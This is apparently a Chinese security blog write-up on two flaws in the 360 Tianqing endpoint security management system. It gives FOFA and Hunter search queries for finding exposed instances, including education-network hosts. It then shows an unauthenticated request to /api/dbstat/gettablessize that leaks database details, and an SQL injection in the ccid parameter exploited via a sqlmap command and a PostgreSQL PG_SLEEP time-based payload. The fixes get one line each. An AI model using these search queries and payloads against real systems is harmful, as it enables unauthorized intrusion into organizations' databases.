目录

360天擎 - 未授权与sql注入

信息收集

FOFA语法

鹰图搜索

360天擎未授权访问 - 数据库信息泄露

漏洞复现

修复方案

360天擎终端安全管理系统ccid处SQL注入

漏洞复现

手动测试方法

修复方案

---

360天擎 - 未授权与sql注入

通常访问的页面如下，存在登录框

信息收集

FOFA语法

1. title="360新天擎"

需重点关注框框的图标，可以聚焦资产搜索

1. icon_hash="-829652342"

鹰图搜索

这边展现EDUSRC的搜索语法，相对来说资产较少，因为是老洞

1. web.title="360新天擎"&& ip.isp="教育"

360天擎未授权访问 - 数据库信息泄露

漏洞复现

路由后拼接/api/dbstat/gettablessize

1. GET /api/dbstat/gettablessize HTTP/1.1
2. Host: {{Hostname}}

修复方案

未授权更多的是鉴权问题，增加权限校验

360天擎终端安全管理系统ccid处SQL注入

漏洞复现

比较推荐的方式先测试是否存在数据库信息泄露，存在的话大概率存在SQL注入

路由后拼接/api/dp/rptsvcsyncpoint?ccid=1

1. GET /api/dp/rptsvcsyncpoint?ccid=1 HTTP/1.1
2. Host: {{Hostname}}

大致页面如下所示

这时候丢到sqlmap中(可能会慢，因为是时间注入)

1. python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1

手动测试方法

360天擎用的大概率是PostgreSQL，尝试如下时间注入payload，然后注意页面响应时间

1. {{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--

修复方案

SQL注入类问题更多的是需要进行参数预处理

还没看够？可以关注一下呦~